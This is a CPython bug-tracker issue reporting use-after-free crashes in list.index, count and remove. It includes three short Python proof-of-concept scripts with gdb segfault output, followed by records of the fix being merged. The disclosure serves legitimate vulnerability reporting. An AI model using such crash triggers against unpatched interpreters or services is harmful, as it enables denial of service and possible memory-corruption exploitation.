Issue38610
Created on 2019-10-28 05:49 by LCatro, last changed 2022-04-11 14:59 by admin. This issue is now closed.
| Pull Requests | |||
|---|---|---|---|
| URL | Status | Linked | Edit |
| PR 17022 | merged | ZackerySpytz, 2019-10-31 20:34 | |
| PR 17758 | merged | miss-islington, 2019-12-30 19:33 | |
| PR 17759 | merged | pablogsal, 2019-12-30 19:35 | |
| PR 18207 | closed | corona10, 2020-01-27 17:39 | |
| Messages (5) | |||
|---|---|---|---|
| msg355513 - (view) | Author: (LCatro) | Date: 2019-10-28 05:49 | |
Code 1 :
static PyObject *
list_index_impl(PyListObject *self, PyObject *value, Py_ssize_t start,
Py_ssize_t stop)
// ...
for (i = start; i < stop && i < Py_SIZE(self); i++) {
int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); <= self->ob_item[i] can uaf ..
PoC :
class rewrite_list_eq(list) :
def __eq__(self,other) :
str(other) # <== that will call the object recall function tp_repr and call it ..
return NotImplemented
class poc() :
def __eq__(self,other) :
list1.clear()
return NotImplemented
list1 = [ poc() ]
list1.index(list1) # list_index_impl() -> PyObject_RichCompareBool()
Crash Report :
(gdb) run ../py_poc/list_poc_3.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_3.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573 if (Py_TYPE(v)->tp_str == NULL)
=====
Code 2 :
static PyObject *
list_count(PyListObject *self, PyObject *value)
{
Py_ssize_t count = 0;
Py_ssize_t i;
for (i = 0; i < Py_SIZE(self); i++) {
int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); // <=
PoC :
class rewrite_list_eq(list) :
def __eq__(self,other) :
str(other)
return NotImplemented
class poc() :
def __eq__(self,other) :
list1.clear()
return NotImplemented
list1 = rewrite_list_eq([ poc() ])
list1.count(list1) # list_count() -> PyObject_RichCompareBool()
Crash Report :
(gdb) run ../py_poc/list_poc_4.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573 if (Py_TYPE(v)->tp_str == NULL)
===
Code 3 :
static PyObject *
list_remove(PyListObject *self, PyObject *value)
/*[clinic end generated code: output=f087e1951a5e30d1 input=2dc2ba5bb2fb1f82]*/
{
Py_ssize_t i;
for (i = 0; i < Py_SIZE(self); i++) {
Py_INCREF(self->ob_item[i]);
int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);
PoC :
class rewrite_list_eq(list) :
def __eq__(self,other) :
str(other)
return NotImplemented
class poc() :
def __eq__(self,other) :
list1.clear()
return NotImplemented
list1 = rewrite_list_eq([ poc() ])
list1.remove(list1) # list_count() -> PyObject_RichCompareBool()
Crash Report :
(gdb) run ../py_poc/list_poc_5.py
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_5.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573 if (Py_TYPE(v)->tp_str == NULL)
|
|||
| msg355766 - (view) | Author: Zackery Spytz (ZackerySpytz) * | Date: 2019-10-31 20:35 | |
I have created a patch to fix these crashes. Please consider taking a look. |
|||
| msg359055 - (view) | Author: Pablo Galindo Salgado (pablogsal) * | Date: 2019-12-30 19:33 | |
New changeset d9e561d23d994e3ed15f4fcbd7ee5c8fe50f190b by Pablo Galindo (Zackery Spytz) in branch 'master': bpo-38610: Fix possible crashes in several list methods (GH-17022) https://github.com/python/cpython/commit/d9e561d23d994e3ed15f4fcbd7ee5c8fe50f190b |
|||
| msg359056 - (view) | Author: miss-islington (miss-islington) | Date: 2019-12-30 19:51 | |
New changeset fcaf14cd9179bb48850f8f81ce8d5cee28129745 by Miss Islington (bot) in branch '3.8': bpo-38610: Fix possible crashes in several list methods (GH-17022) https://github.com/python/cpython/commit/fcaf14cd9179bb48850f8f81ce8d5cee28129745 |
|||
| msg359057 - (view) | Author: Pablo Galindo Salgado (pablogsal) * | Date: 2019-12-30 19:58 | |
New changeset 296d45ec10fb55532bc3fac2311a3f91299ecf59 by Pablo Galindo in branch '3.7': [3.7] bpo-38610: Fix possible crashes in several list methods (GH-17022) (GH-17759) https://github.com/python/cpython/commit/296d45ec10fb55532bc3fac2311a3f91299ecf59 |
|||
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2022-04-11 14:59:22 | admin | set | github: 82791 |
| 2020-01-27 17:40:43 | corona10 | set | versions: + Python 3.6 |
| 2020-01-27 17:39:50 | corona10 | set | pull_requests: + pull_request17584 |
| 2019-12-30 19:58:43 | pablogsal | set | status: open -> closed resolution: fixed stage: patch review -> resolved |
| 2019-12-30 19:58:34 | pablogsal | set | messages: + msg359057 |
| 2019-12-30 19:51:14 | miss-islington | set | nosy:
+ miss-islington messages: + msg359056 |
| 2019-12-30 19:35:36 | pablogsal | set | pull_requests: + pull_request17195 |
| 2019-12-30 19:33:27 | miss-islington | set | pull_requests: + pull_request17194 |
| 2019-12-30 19:33:06 | pablogsal | set | nosy:
+ pablogsal messages: + msg359055 |
| 2019-10-31 20:35:48 | ZackerySpytz | set | nosy:
+ ZackerySpytz messages:
+ msg355766 |
| 2019-10-31 20:34:16 | ZackerySpytz | set | keywords:
+ patch stage: patch review pull_requests: + pull_request16539 |
| 2019-10-28 05:49:18 | LCatro | create | |